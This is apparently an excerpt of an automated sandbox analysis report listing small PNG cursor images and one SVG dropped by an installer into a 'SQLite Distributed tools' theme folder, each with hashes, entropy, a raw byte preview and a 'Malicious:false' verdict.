                                                                  Preview: .PNG........IHDR.............R;^j....sBIT....|.d.....pHYs...k...k..D......tEXtSoftware.www.inkscape.org..<.....IDAT8...1..a....../8...b...8.....M....`...K.n."AP.A".-."!......&...V.......:. _.......y.~p.<.>.'...;....e...4..RI.^O........X,v...%I.JE.7......f.Y-..I.l6S ......N.i.Z.....>l...s.....no..` ......?l..#......^.V.....n.~...4.N5...\./...E....m....Z-5..K..td....u..r~.r..,.D.....1.t..z}..n.....F5..5.LT.........:.}.....*.J.0..?....6.z..L&#..pw..7.r....} ..L&.....n.[v..F....Z.&...~o....-.4.].....#.}.B.....IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\internal_fill.png (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 17 x 14, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):737
                                                                  Entropy (8bit):7.599722429280174
                                                                  Encrypted:false
                                                                  SSDEEP:12:6v/7jqjdkH+RgpZpbkNaOGic+larurmVuIC9OE5PisP+222eNFVHnUsg/CbWLvdB:TjdkPpvqfMgayanC8AasPj22UNn2/C8j
                                                                  MD5:2B9AC9BCE8E827E3485EC896C2A9F29E
                                                                  SHA1:3D99D126A4C0B0D80463942EE64F2170B0B4206C
                                                                  SHA-256:A41C993EAF9B27FCB56CE095873FFD13B09178527CC775D41A06287F3D65226E
                                                                  SHA-512:43F99182F52BF4892737DFAF4B619AC7122519F181BFDF0225304F5C09E6946511F3294F109529B6C1A3EC3B8518BC46A93D9FD0E9E46130E95F9CF04C04CA2C
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR.....................sBIT....|.d.....pHYs...O...O...8.....tEXtSoftware.www.inkscape.org..<....^IDAT(....K.a...w....`M..C... ..m......$g..y.RJ...5.TPgB...9..d..=1'E.C.:......jXi...7.u..O...*Q.... uw@.G..>.cW..K...,.~V....S.d.h.4..m. ....$%$..>L}........PX.l.-.z@.........$.~rN;w...g/..T..._:........b......d..3f...../5....pA~!.r.0;3.K...C....."..@.)H.7.j....v".X....']..O..p....;;..r.........'".L....M..K.b.q.y3...n....2.^2#1>.Z....+..7C....W.. .p...A......a0.5. ..d.zB.P.+...a....N=*-7.....P../{.....].....".%.D..sy...@ ..h....+.G.TX..U.......<c..}.....<l}...&..'.>kT.N?..b5.%..t....C`m..8.|..Y""b.J.....J4.....Oz.^/. ...........s..DqQ..j..................D.........;".fw..&.w....)....IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\is-179M4.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 12 x 12, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):284
                                                                  Entropy (8bit):6.646773797274347
                                                                  Encrypted:false
                                                                  SSDEEP:6:6v/lhPIc5z7aQGfYkUEFlnUXmGmlgIEQD5Fc6I+9VJg6ClHyYv5/bp:6v/7Dt+lfYkvFCXmGSXEQlFcRuVCnN9
                                                                  MD5:2F0FF9CFE2D328B387E536C2CFD41C51
                                                                  SHA1:202BC85B2CC1A4B58326D325A7E89AB82D5DEE80
                                                                  SHA-256:96910DB3F31270937EC768C3A72A8E1E0F6D1E3AD733C939E48E1418D080164E
                                                                  SHA-512:BBDA1489768AA8911E6AB3EFA5AC66A6EE03870206A241FE5127F895C3AF775A71AC2E346E484F1B2B53FB0F5CF8E47071C504B08C6DFD615B80E5574F30A9BD
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR.............Vu\.....bKGD......).......pHYs..........6......tIME..........I....IDAT(..1..0.E..=....r.Z=.^.2UZ..^..k........~vw6..`...........7.g..w.......pb.<..P;..w.*......jm.m..i...a.(....!...O.4..}...u....ai#..U..9.UE........w.^v.B..~...!4>...f.....IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\is-4J8PM.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 16 x 18, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):530
                                                                  Entropy (8bit):7.32195204505726
                                                                  Encrypted:false
                                                                  SSDEEP:12:6v/7oY0Z6qdwLNEmQpnDpIrPL+g+x8OIMdLLZ2hNjuLd5d:3Y0UMb7lILKebMuyLN
                                                                  MD5:DEFFEB127766CD27629FA49DA6224363
                                                                  SHA1:F1029F992B282CF4A98E3D2EEAA6B1C8875C76C4
                                                                  SHA-256:ADD8FB99FDF4BEF7D7B1E3E2E75540DC78725278CCE437ED0491EBC6A2F41F38
                                                                  SHA-512:831CEF0D2D2E8EC5850E23D22294BB6B010348DE0B325BA4D1B60793FC4D3B3B2A8B46E43CF72E4D6A7800E29F7F6DDB769822C8F02D50F3FE5DD745623FA16F
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR.............R;^j....sBIT....|.d.....pHYs...k...k..D......tEXtSoftware.www.inkscape.org..<.....IDAT8...1..a....../8...b...8.....M....`...K.n."AP.A".-."!......&...V.......:. _.......y.~p.<.>.'...;....e...4..RI.^O........X,v...%I.JE.7......f.Y-..I.l6S ......N.i.Z.....>l...s.....no..` ......?l..#......^.V.....n.~...4.N5...\./...E....m....Z-5..K..td....u..r~.r..,.D.....1.t..z}..n.....F5..5.LT.........:.}.....*.J.0..?....6.z..L&#..pw..7.r....} ..L&.....n.[v..F....Z.&...~o....-.4.].....#.}.B.....IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\is-CID2B.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):307
                                                                  Entropy (8bit):6.698912856798699
                                                                  Encrypted:false
                                                                  SSDEEP:6:6v/lhPysQxrdKcxNlCR89GFGVdKCMEaewiQU8up:6v/7w/ZxNlVQFGzDDao8c
                                                                  MD5:587E9F48113D45B0901B271450BD5550
                                                                  SHA1:994B153B21E57D4A303BF508DD9BB3650336FBCE
                                                                  SHA-256:96200B632559D2B8073CA3379D5C541A25B9A6569A7DFD0D52E77F811205BEF9
                                                                  SHA-512:D0BD87131EFC0896E91BBD0D80A87E946EF1F7C7593B161666572D33412418F6C332288A2E581D9833478295FE86F068474AE12587EEA08B0548A1C682E3E6BC
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR................a....sBIT....|.d.....pHYs...r...r.%.d]....tEXtSoftware.www.inkscape.org..<.....IDAT8...m.P.D.#9$.2..$@p.P.}8....Z\.%...q.Zi.}.O.d.8.#.....sUU*.B@....U...5.....k.g._!<...].4.....?.G.?..8.qlf.9..{.?...mS.u.q..."..O8.t._#xM)i.w5M#....yY..u-...p......~.|}r..t.(....IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\is-EKEQE.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 20 x 18, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):467
                                                                  Entropy (8bit):7.156353601998168
                                                                  Encrypted:false
                                                                  SSDEEP:12:6v/7k5Sjlv7Z9BQtTRmTrWLlpf4Ab0P90QFiUr+lt:h5eR7bBWCKLld50P3Ylt
                                                                  MD5:7796C02D7A2B5C0DF877651BBCA5A5C4
                                                                  SHA1:A9D86E71FB1617F6417252AD84B201C225573B86
                                                                  SHA-256:2CDC6F9758F476849860A1922AB80D1DE6132CF9149A6D318CE65FFB042CF19E
                                                                  SHA-512:D41F3E02F86D6CDE1C18A62BEF19CDAF83EAD2617D0C03E6989243BEF75BBC3A032842F07769F835CA01F01B3B4BE8386A2109965D0034B5E38651E229FEFA6F
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR.............[.......sBIT....|.d.....pHYs..........N......tEXtSoftware.www.inkscape.org..<....PIDAT8...?K.q.........Eh.....GA...r</(Hnrj(..]...D. BsCC.q45..HM.n......+....><....._.v.|...B........G.b..\..l.p.*v\(.~{.....G ..E..J...<O.....P....e4.I&....*...\..x,.i..Ul.....L&..,+.NT1.xo.Z.X,.X,...*.p..td>.K.\^..*d..z..O.S).J!p..../.JI.......l6;.,..M...}....i.*.p...8""R.V..P.b.G:.. ...n...l.`...i.2...V......;.x.F....g.P...!$y..}......IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\is-GRIGS.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):196
                                                                  Entropy (8bit):6.025229364210005
                                                                  Encrypted:false
                                                                  SSDEEP:6:6v/lhPvz7aQGZj46wlifH0d1EsTacMpNOZ0oeZkaCLoUp:6v/7T+ldB0d1ocH0oGTCL
                                                                  MD5:16441AFA71600F639F1584C1BF3BC297
                                                                  SHA1:0643EA6B12F87268E381B6838A94EA3CC2BEE6DE
                                                                  SHA-256:0EAC2F4F57ECFA97BF8EA09BDB9E0ADA6304312EFCDF8CD9810498B540792C93
                                                                  SHA-512:4A4FDED6D6B1A11C754687FAA4FCD30772A46934B275FCBE01548BD288C2ED2A0167AE40AAD344FB6AD619F5BB12C981E7608B7C04801CD1A6F41B145451BAD5
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR................a....bKGD......).......pHYs.........]R......tIME.......bQ.....QIDAT8..!..0....T..>...T.......L.2..`kj..Q..Z.]..."I.d......?...jv.p...{....5NJp..Mn .....IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\is-H2SFJ.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 17 x 14, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):737
                                                                  Entropy (8bit):7.599722429280174
                                                                  Encrypted:false
                                                                  SSDEEP:12:6v/7jqjdkH+RgpZpbkNaOGic+larurmVuIC9OE5PisP+222eNFVHnUsg/CbWLvdB:TjdkPpvqfMgayanC8AasPj22UNn2/C8j
                                                                  MD5:2B9AC9BCE8E827E3485EC896C2A9F29E
                                                                  SHA1:3D99D126A4C0B0D80463942EE64F2170B0B4206C
                                                                  SHA-256:A41C993EAF9B27FCB56CE095873FFD13B09178527CC775D41A06287F3D65226E
                                                                  SHA-512:43F99182F52BF4892737DFAF4B619AC7122519F181BFDF0225304F5C09E6946511F3294F109529B6C1A3EC3B8518BC46A93D9FD0E9E46130E95F9CF04C04CA2C
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR.....................sBIT....|.d.....pHYs...O...O...8.....tEXtSoftware.www.inkscape.org..<....^IDAT(....K.a...w....`M..C... ..m......$g..y.RJ...5.TPgB...9..d..=1'E.C.:......jXi...7.u..O...*Q.... uw@.G..>.cW..K...,.~V....S.d.h.4..m. ....$%$..>L}........PX.l.-.z@.........$.~rN;w...g/..T..._:........b......d..3f...../5....pA~!.r.0;3.K...C....."..@.)H.7.j....v".X....']..O..p....;;..r.........'".L....M..K.b.q.y3...n....2.^2#1>.Z....+..7C....W.. .p...A......a0.5. ..d.zB.P.+...a....N=*-7.....P../{.....].....".%.D..sy...@ ..h....+.G.TX..U.......<c..}.....<l}...&..'.>kT.N?..b5.%..t....C`m..8.|..Y""b.J.....J4.....Oz.^/. ...........s..DqQ..j..................D.........;".fw..&.w....)....IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\is-J7J7O.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 8 x 8, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):310
                                                                  Entropy (8bit):6.6688095616742995
                                                                  Encrypted:false
                                                                  SSDEEP:6:6v/lhPZNQzFFdKcpywcapQN1gUB7G0C7S5oO3Zng0r11ATp:6v/7R2zFDZpywcPN1JB7G0COmO1rHA9
                                                                  MD5:DACF614DC0D6524F44616C68AD12C98C
                                                                  SHA1:1CC9DC91851FBA6A715D8C6940F40EC449EA281F
                                                                  SHA-256:FFAE5B58E048BF7920E1DBA58D1FA8E58C9E8DD14FA984B31510EB48221E2D77
                                                                  SHA-512:05FC5CED9C6FAF95D0107224D29AF17CFCDFD3108A641124E8A9C06E7D70D9C5567022786516A712293706F04EE2A5849943042D7C6E28FCD6B91957328A593B
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR.....................sBIT....|.d.....pHYs...........a.....tEXtSoftware.www.inkscape.org..<.....IDAT..U....@..g.y.;.*H.."D.....{.=G.$..!vH."x....}...f.....p~3M....mu.....`..1I..4QjM.(*......~..DD...m..pJ.|.}.!...9...#].a..0...R!..B....p.q\j..Z.y$.o....k.....4R.q...8..2.je.....IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\is-JU5SL.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:SVG Scalable Vector Graphics image
                                                                  Category:dropped
                                                                  Size (bytes):29942
                                                                  Entropy (8bit):4.907190632740671
                                                                  Encrypted:false
                                                                  SSDEEP:384:sXltlHGT47TJjpbYzcXFLr4gaj8kt26LxFRKtpppoYcKL1WTs3Rtxi:sX37pczcVHQ8kt26LRKDlcKL1WTs3zxi
                                                                  MD5:460A93892B06FA42822EB2E0FF9B09CF
                                                                  SHA1:4264F0C907E5400444435B62FEF1237EE461F9F5
                                                                  SHA-256:47D058F0E54A43E2D07B4A226404BA04BCE3F57CE8451CF5C9420D038881B6F5
                                                                  SHA-512:207471CD3CE328D0992A0488D24B1606A8E9B3D16B035D8CF0680909A11066398B0E4902682FD955D8A0E3B374F466C65487218E284B590B9FEDEA70C9B40B79
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="no"?>. Created with Inkscape (http://www.inkscape.org/) -->..<svg. xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:cc="http://creativecommons.org/ns#". xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#". xmlns:svg="http://www.w3.org/2000/svg". xmlns="http://www.w3.org/2000/svg". xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd". xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape". width="210mm". height="297mm". viewBox="0 0 744.09448819 1052.3622047". id="svg2". version="1.1". inkscape:version="0.91 r13725". sodipodi:docname="cursors.svg">. <defs. id="defs4" />. <sodipodi:namedview. id="base". pagecolor="#ffffff". bordercolor="#666666". borderopacity="1.0". inkscape:pageopacity="0.0". inkscape:pageshadow="2". inkscape:zoom="0.35355339". inkscape:cx="917.88094". inkscape:cy="592.10563". inkscape:document-units="px". inkscap
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\is-MHIB5.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):494
                                                                  Entropy (8bit):7.3075284277159955
                                                                  Encrypted:false
                                                                  SSDEEP:12:6v/7TZH16ccPG7T2sGrHQVpiEXFwpSla68CxBc0XW68:Eb/7CsgSXX4Sc6qaO
                                                                  MD5:701F09509547991176CD3793E5A05D85
                                                                  SHA1:266BA76F15A7E98177C98E9B2E5166D07495D42C
                                                                  SHA-256:2EDC3C5F82650B61A3726E5E5E227A06561EBDCD3F0733E003B2CCE0060115FE
                                                                  SHA-512:829A469061F4717FB4F0FD2C51696B94B7728BBEF4701E6C739E564902B56743B8BA65B01F90AB3B2E8B35631AB98CCC249A931B7ABF3F258F1983AAEEF08F98
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR................a....bKGD.^.^.^........pHYs...R...R...E.....tIME.....0".O.B...{IDAT8...K.a......{t...{.R.{...Q.4........kcP ....Q .8e.@.78h.'..wo..$...gyx...O.B..l#.VUU.+...9.......L&{.j.O$...i...2..M..i...D.Xtc......../D`.]..e1.h4..|~..{.... .1.......bZ.e.\....zK..._.....M....j.D&..s._...%..qW..~.<...fs.J.....C..#.-.X..:..e..>.m..R..u.R)KQ...r.1t]?.v...~.snM..f.....:.H$..h4..1.. ..3...q..#B.T.T.l.Y.*7..h?.N....z..0^TU.....-.....,..8.A?...[4..T/..........IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\is-S78HE.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):635
                                                                  Entropy (8bit):7.412938886787909
                                                                  Encrypted:false
                                                                  SSDEEP:12:6v/7T+l9jCDdTC760CKAL2itUr814DRSwqhu9vaXJhwh3rzLHrhUDwT4pcXypDmz:E2+DdTg60vALN6Rou9vaXJypyDx+ypDI
                                                                  MD5:26EF5CCD4225951D472E2AC7D243E62E
                                                                  SHA1:C1161094E3F6672BD4114502C82F9E4C7AAA25BB
                                                                  SHA-256:4A58D71984B72866A4A136557ADB149807A4B912F10F097E28A2C0AF2568465A
                                                                  SHA-512:1AA5FBE94F039AE6F5215DC061B111DDB055AFB0A2387A5AEF9FB2A7421DAB5AE91D9A4EE4D647E2E528B38899D23BF80D6FC2F5E53099233AD828352B4F8524
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR................a....bKGD......).......pHYs...0...0...'{....tIME..............IDAT8..=..Q...{...(A.f.A1.A...e.`#.......mS...R/.).b.".@..V...&3~-.9:o...6$...ns9..x...&..#...6B.]4....._.r..I}.^.!.%..... ..~.R....X,...@.|...d2+.4...j...>...J..p.J).r9.T... .H\.`:.f.......u]z.G....<99!..R.._<+..a....t]..1.N.....|...k....wrqqA.4M..NOO..xww..<.v..h4....0.R....|..u9.L...)..J...D.{.JJ)...r..R..p8`.Z..m...H.....F..)H".........J..$.....B!.F.?....l.~.....M.>k.F.8.....C.l6..,.......5.......j.....8....p8d...*....:.Nt<...x..b..'?H.u.4.i.;..../......O.o.. Ij.R.m<...i.LJ..Bl..XY.u.n.?......d.7\...J..+....IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\is-TU5GE.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):246
                                                                  Entropy (8bit):6.441904267416803
                                                                  Encrypted:false
                                                                  SSDEEP:6:6v/lhPv19YVlA4/RcjXUfgrswwI6is5JsQeIYAFv8XO/ibEyfljp:6v/7jojRwxYF58+q3NN
                                                                  MD5:851AEE7BB4494F397C54C61E6A4AD850
                                                                  SHA1:3BF611EEC106240F145A014B3891F151A6423D13
                                                                  SHA-256:6DD04B476E85D7E2BD4846DE186FE440365E08116B9AE451CA8CEEBDC6AC9640
                                                                  SHA-512:C60A9469C594BAE6260AAB98105AC8482395CC0B9DD9FE988A23801A8CFE8C29AA63766A543826E3A59718382395F72DED80D3D176A63CCA2885BE0312DFA748
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR................a....bKGD..............pHYs...0...0...'{....tIME.....6.."z....IDAT8...1..`........'p.:.....8x.:.Y\....]....X.~.._.7...D..."..=U...Xb....Em.m,.`.}.v8`...S7Ym.#...0.7F.9.QC.2....{K.j...o.[G...Kh$.`U.Z....IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\is-VDPIU.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):472
                                                                  Entropy (8bit):7.304517452099432
                                                                  Encrypted:false
                                                                  SSDEEP:12:6v/7jojRZw5deasPaSRWdBTC2YNOm1GAnIsH3A7Zg5DY3:WoVZuvoudxQNOqrXA7Zg5Dy
                                                                  MD5:DA0AA6853B8C4506458C03EE2ED89D74
                                                                  SHA1:0A02713202E4CDC18231A58BBEA00B7FF2A06D69
                                                                  SHA-256:1C4E648338CC786F3C2703758A338275FF732D8D075B53FCFD3FE8A6BCDA1DB7
                                                                  SHA-512:F915A85F3670BD903758E35E1B2394BAC281CA93B07E78D1BD3F48C9C991563C44426CA9E6D3A98BF6304E41F4B8298D053F2A15C1437E53BA0C31BE083DBBAB
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR................a....bKGD..............pHYs...0...0...'{....tIME.....5........eIDAT8.u.K.Q...._.C.5.%u.Pp.!....q........D...E?(..Eph.k....K.. Jq]..t.......}^..<.....4....U.....*.0.!..WQ.u...m..>...sW.F......<.0.R.2.>...4:....o....\.'|N.<w.x..&c.x..p+.y,&n.;&R;R...ql...Bq._.8N...E.6.X..:M..N....f.).F.z:.].9...8....b....`g.'X.....:..........?./....c....b.............4....f.x....n_..o.U|.Vr....a..=....l....*G.Q.I.q>...O....#....IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\line.png (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):307
                                                                  Entropy (8bit):6.698912856798699
                                                                  Encrypted:false
                                                                  SSDEEP:6:6v/lhPysQxrdKcxNlCR89GFGVdKCMEaewiQU8up:6v/7w/ZxNlVQFGzDDao8c
                                                                  MD5:587E9F48113D45B0901B271450BD5550
                                                                  SHA1:994B153B21E57D4A303BF508DD9BB3650336FBCE
                                                                  SHA-256:96200B632559D2B8073CA3379D5C541A25B9A6569A7DFD0D52E77F811205BEF9
                                                                  SHA-512:D0BD87131EFC0896E91BBD0D80A87E946EF1F7C7593B161666572D33412418F6C332288A2E581D9833478295FE86F068474AE12587EEA08B0548A1C682E3E6BC
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR................a....sBIT....|.d.....pHYs...r...r.%.d]....tEXtSoftware.www.inkscape.org..<.....IDAT8...m.P.D.#9$.2..$@p.P.}8....Z\.%...q.Zi.}.O.d.8.#.....sUU*.B@....U...5.....k.g._!<...].4.....?.G.?..8.qlf.9..{.?...mS.u.q..."..O8.t._#xM)i.w5M#....yY..u-...p......~.|}r..t.(....IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\line_fill.png (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 20 x 18, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):467
                                                                  Entropy (8bit):7.156353601998168
                                                                  Encrypted:false
                                                                  SSDEEP:12:6v/7k5Sjlv7Z9BQtTRmTrWLlpf4Ab0P90QFiUr+lt:h5eR7bBWCKLld50P3Ylt
                                                                  MD5:7796C02D7A2B5C0DF877651BBCA5A5C4
                                                                  SHA1:A9D86E71FB1617F6417252AD84B201C225573B86
                                                                  SHA-256:2CDC6F9758F476849860A1922AB80D1DE6132CF9149A6D318CE65FFB042CF19E
                                                                  SHA-512:D41F3E02F86D6CDE1C18A62BEF19CDAF83EAD2617D0C03E6989243BEF75BBC3A032842F07769F835CA01F01B3B4BE8386A2109965D0034B5E38651E229FEFA6F
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR.............[.......sBIT....|.d.....pHYs..........N......tEXtSoftware.www.inkscape.org..<....PIDAT8...?K.q.........Eh.....GA...r</(Hnrj(..]...D. BsCC.q45..HM.n......+....><....._.v.|...B........G.b..\..l.p.*v\(.~{.....G ..E..J...<O.....P....e4.I&....*...\..x,.i..Ul.....L&..,+.NT1.xo.Z.X,.X,...*.p..td>.K.\^..*d..z..O.S).J!p..../.JI.......l6;.,..M...}....i.*.p...8""R.V..P.b.G:.. ...n...l.`...i.2...V......;.x.F....g.P...!$y..}......IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\polyline.png (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 12 x 12, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):284
                                                                  Entropy (8bit):6.646773797274347
                                                                  Encrypted:false
                                                                  SSDEEP:6:6v/lhPIc5z7aQGfYkUEFlnUXmGmlgIEQD5Fc6I+9VJg6ClHyYv5/bp:6v/7Dt+lfYkvFCXmGSXEQlFcRuVCnN9
                                                                  MD5:2F0FF9CFE2D328B387E536C2CFD41C51
                                                                  SHA1:202BC85B2CC1A4B58326D325A7E89AB82D5DEE80
                                                                  SHA-256:96910DB3F31270937EC768C3A72A8E1E0F6D1E3AD733C939E48E1418D080164E
                                                                  SHA-512:BBDA1489768AA8911E6AB3EFA5AC66A6EE03870206A241FE5127F895C3AF775A71AC2E346E484F1B2B53FB0F5CF8E47071C504B08C6DFD615B80E5574F30A9BD
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR.............Vu\.....bKGD......).......pHYs..........6......tIME..........I....IDAT(..1..0.E..=....r.Z=.^.2UZ..^..k........~vw6..`...........7.g..w.......pb.<..P;..w.*......jm.m..i...a.(....!...O.4..}...u....ai#..U..9.UE........w.^v.B..~...!4>...f.....IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\square.png (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):196
                                                                  Entropy (8bit):6.025229364210005
                                                                  Encrypted:false
                                                                  SSDEEP:6:6v/lhPvz7aQGZj46wlifH0d1EsTacMpNOZ0oeZkaCLoUp:6v/7T+ldB0d1ocH0oGTCL
                                                                  MD5:16441AFA71600F639F1584C1BF3BC297
                                                                  SHA1:0643EA6B12F87268E381B6838A94EA3CC2BEE6DE
                                                                  SHA-256:0EAC2F4F57ECFA97BF8EA09BDB9E0ADA6304312EFCDF8CD9810498B540792C93
                                                                  SHA-512:4A4FDED6D6B1A11C754687FAA4FCD30772A46934B275FCBE01548BD288C2ED2A0167AE40AAD344FB6AD619F5BB12C981E7608B7C04801CD1A6F41B145451BAD5
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR................a....bKGD......).......pHYs.........]R......tIME.......bQ.....QIDAT8..!..0....T..>...T.......L.2..`kj..Q..Z.]..."I.d......?...jv.p...{....5NJp..Mn .....IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\target.png (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 8 x 8, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):310
                                                                  Entropy (8bit):6.6688095616742995
                                                                  Encrypted:false
                                                                  SSDEEP:6:6v/lhPZNQzFFdKcpywcapQN1gUB7G0C7S5oO3Zng0r11ATp:6v/7R2zFDZpywcPN1JB7G0COmO1rHA9
                                                                  MD5:DACF614DC0D6524F44616C68AD12C98C
                                                                  SHA1:1CC9DC91851FBA6A715D8C6940F40EC449EA281F
                                                                  SHA-256:FFAE5B58E048BF7920E1DBA58D1FA8E58C9E8DD14FA984B31510EB48221E2D77
                                                                  SHA-512:05FC5CED9C6FAF95D0107224D29AF17CFCDFD3108A641124E8A9C06E7D70D9C5567022786516A712293706F04EE2A5849943042D7C6E28FCD6B91957328A593B
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR.....................sBIT....|.d.....pHYs...........a.....tEXtSoftware.www.inkscape.org..<.....IDAT..U....@..g.y.;.*H.."D.....{.=G.$..!vH."x....}...f.....p~3M....mu.....`..1I..4QjM.(*......~..DD...m..pJ.|.}.!...9...#].a..0...R!..B....p.q\j..Z.y$.o....k.....4R.q...8..2.je.....IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\text.png (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):246
                                                                  Entropy (8bit):6.441904267416803
